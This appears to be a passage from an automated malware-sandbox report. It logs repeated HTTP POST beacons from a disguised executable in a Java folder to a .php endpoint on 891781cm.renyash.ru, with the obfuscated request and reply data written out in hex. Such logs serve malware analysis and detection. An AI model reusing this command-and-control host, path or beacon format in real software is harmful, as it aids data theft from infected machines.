                                                                                                                  Jan 1, 2025 15:03:36.873956919 CET797INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FONIoogswPRyJOtEq6Ic0Vo5xjr%2Fnjz2kz0Nit2lxNRYsaNAbJTtOCzXyvBTxWBsJyxiYHELUU%2BhnD1yIgUb6NOFUtNatbPXbzPRBmlD3meJnHVAI1I61jPyFV5u1d5WnEWStXda"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dc22bb6de97-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4349&min_rtt=1499&rtt_var=6263&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=60072&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
                                                                                                                  Jan 1, 2025 15:03:36.960817099 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  119192.168.2.450126104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:37.368474960 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  120192.168.2.450127104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:37.562930107 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:37.916093111 CET1796OUTData Raw: 50 53 5d 51 5f 59 51 59 55 5a 54 59 51 52 55 5d 58 5a 5c 54 59 50 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PS]Q_YQYUZTYQRU]XZ\TYPR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ X?!+&21X>3[0':-<$/)3,/X;+>$>#^!'^)
                                                                                                                  Jan 1, 2025 15:03:38.016895056 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:38.277766943 CET949INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k9MgWSFy51Z322sbFsWyaK9VUVkwY8wjoqTkBbb0QMcG6AnreFVP47JMmxdLZUm8cCJdawGo77P2GiyrAZSW0yRFnHCgj8dojIU9Exqc3A3fwA3UpKloAtWFQeMYJOHP9cQ%2F6c9W"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dca4cc80fa4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3968&min_rtt=1566&rtt_var=5392&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=70239&cwnd=175&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 12 27 02 27 1b 2b 00 22 5a 2f 2f 05 54 31 3f 2a 5f 24 09 2c 5b 25 3e 13 5f 2e 06 2c 1e 2b 38 2b 5a 24 2a 2d 11 20 08 21 03 25 0c 2e 5d 04 1d 25 5a 3f 3a 32 59 3c 11 07 13 3d 31 30 16 24 09 2f 5d 25 27 3b 00 27 2d 26 1f 21 22 2b 10 30 20 2c 54 3f 2a 30 06 30 13 39 0c 23 3a 2e 57 0d 12 21 0c 25 00 1c 0d 2a 21 2b 0f 22 12 28 0a 27 2f 0a 09 24 02 3f 0e 37 3b 3e 54 29 3f 0d 04 21 09 3a 0d 30 2a 09 58 35 07 29 11 36 19 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"''+"Z//T1?*_$,[%>_.,+8+Z$*- !%.]%Z?:2Y<=10$/]%';'-&!"+0 ,T?*009#:.W!%*!+"('/$?7;>T)?!:0*X5)6"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  121192.168.2.450128104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:37.716358900 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:38.072092056 CET1064OUTData Raw: 55 56 58 55 5f 59 51 5a 55 5a 54 59 51 5b 55 57 58 52 5c 55 59 51 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXU_YQZUZTYQ[UWXR\UYQRY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#)?" &."*/3.P.$$0*U$Z3^,?+>$V=,#^!'^)/
                                                                                                                  Jan 1, 2025 15:03:38.161473989 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:38.429141045 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrJfNEyRg04AkIAjyqA%2FSWNWIPEt%2FXhkVp85XRUNWi1fKPQsLaXZBmTrdT5ZFpWBlMNfrzDbzDIBcVlpjM8EmhbNHIlnKMwgHVlzyETNZi18P3DOWTkks8bwg8O0TDF76QVlXQCU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dcb3c044325-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2199&min_rtt=1739&rtt_var=1574&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=269074&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  122192.168.2.450129104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:38.561950922 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:38.915797949 CET1072OUTData Raw: 55 55 5d 51 5a 5e 54 59 55 5a 54 59 51 52 55 57 58 58 5c 5e 59 52 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UU]QZ^TYUZTYQRUWXX\^YRRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ _)/)] :$>2>('4:T-$\3?U$?8->?;>#^!'^)
                                                                                                                  Jan 1, 2025 15:03:39.007306099 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:39.181797028 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BYPz36BahP1%2BVkOKvRjqwYJGKsvLbl5M%2F7PHd4KTBZMB5w7Vc7zIHt9d2EKa8GU77A%2FCSprfnC7Cp6rZGkuzgo39Hw05QDvkIOYsYK5N85HxHCbUhKupA6F6M0BH58Cw%2BJ%2BOeQOw"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dd08d2a1a17-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2122&min_rtt=2001&rtt_var=994&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=490756&cwnd=127&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  123192.168.2.450130104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:39.309048891 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:39.670267105 CET1072OUTData Raw: 55 55 58 51 5a 5d 51 55 55 5a 54 59 51 58 55 53 58 5e 5c 59 59 54 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UUXQZ]QUUZTYQXUSX^\YYTRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#</. ;$-5[)4&$2:''36T'3_-=$[<-$T(,#^!'^)+
                                                                                                                  Jan 1, 2025 15:03:39.755247116 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:39.931443930 CET805INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:39 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MFi%2Btdd3rTwsb6zv8ZwoopLHu%2B04KYnHbhm9sSUdOchgaVmLOvRB72fembr7hWrQy0lLgSpnVr1p5QtQDYo3%2FB82nzRulT5LQ1OD65EHv6aWkUnYM9Em5bbaMaPbI5iSE8PWJ2cv"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dd52ada0cc4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2608&min_rtt=1748&rtt_var=2376&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=169177&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  124192.168.2.450131104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:40.057506084 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:40.415766001 CET1072OUTData Raw: 55 51 58 5d 5f 5e 51 5b 55 5a 54 59 51 53 55 55 58 59 5c 5a 59 53 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UQX]_^Q[UZTYQSUUXY\ZYSRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#?<)[#>$.=Z(>037:U,$$_'$<,,<#>#^!'^)
                                                                                                                  Jan 1, 2025 15:03:40.511219025 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:40.778501034 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:40 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ojxLXi3gMDI580nKzTTtw%2F8OOqVUuzDHLPOnfzSIsSTb7P0bwQhMVRTJlBo4%2BV6NDVGWXYYCeDY9M2WHky5XWg1N9HWAmNTDiH%2BCI98Ep9f3CImXEo096mBUvI9uXN42Oll2cIEi"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30dd9eec04213-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4820&min_rtt=1726&rtt_var=6837&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=55125&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  125192.168.2.450132104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:40.901882887 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:41.259690046 CET1072OUTData Raw: 55 50 5d 51 5f 5c 51 5a 55 5a 54 59 51 5d 55 5c 58 53 5c 54 59 55 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UP]Q_\QZUZTYQ]U\XS\TYURZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<)X4"1.)).7Z3$-94$Y"0?_-> ]<(U*#^!'^)?
                                                                                                                  Jan 1, 2025 15:03:41.403414011 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:41.667954922 CET808INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dvs6zxibhEErBja0jhWKrckuKHTqYe45%2Fkx60Wyq%2F9KyOr3U2x0sWKCA2qMdLL8BfPHbUhYrrRlG4o7wRFehY5EX4ufj1zLSBg1%2FtQro0hU6%2FFDGsUMukwDu6%2BbmLR8VoYAAKrjU"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30ddf7ce8422e-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4893&min_rtt=1773&rtt_var=6906&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=54601&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  126192.168.2.450133104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:41.794842005 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:42.150074959 CET1064OUTData Raw: 55 52 58 5d 5f 5c 51 5b 55 5a 54 59 51 5b 55 51 58 53 5c 5f 59 5c 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: URX]_\Q[UZTYQ[UQXS\_Y\R\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <,>7;%X&")./_&72940/U0<8/- ^(>(<#^!'^)7
                                                                                                                  Jan 1, 2025 15:03:42.269618988 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:42.438977957 CET806INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nz4zPgOIT82Il3JXCKgXa9A0MlCU51AJ339tWkac41pP%2Bcol2TEytx2Drzo%2FQrdngK6Qydi1fyn1DCwIHRL4ap1sG3KjuRjHrVbTLtIQbqNX7%2BRp%2FP6SMZ7CYqZIgPSeEEFj74Um"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30de4d8bfef9f-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4239&min_rtt=1956&rtt_var=5300&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=72187&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  127192.168.2.450134104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:42.560156107 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:42.915725946 CET1072OUTData Raw: 55 5e 5d 57 5a 5e 51 5e 55 5a 54 59 51 52 55 53 58 5a 5c 5b 59 57 52 5a 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: U^]WZ^Q^UZTYQRUSXZ\[YWRZ][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ?1Z4;91>])=,0.P-+310?3;X(<>S><#^!'^)
                                                                                                                  Jan 1, 2025 15:03:43.022686958 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:43.284756899 CET809INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:43 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2M6UO3FLEGlTtovYCVr%2BGLIr2hQ5BSGff5cE320pcDK8E%2BbSaBME9Se7WUG7Usvnnm9%2FjiC3BziSkppI4pKTFKJUnQAH%2FK0gSM5eIqpsXw%2FGvIt2ZFAB%2BzhGG8sFZv4zRwpWzwwo"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30de99d4bf5f8-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=3589&min_rtt=1693&rtt_var=4428&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=86559&cwnd=90&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
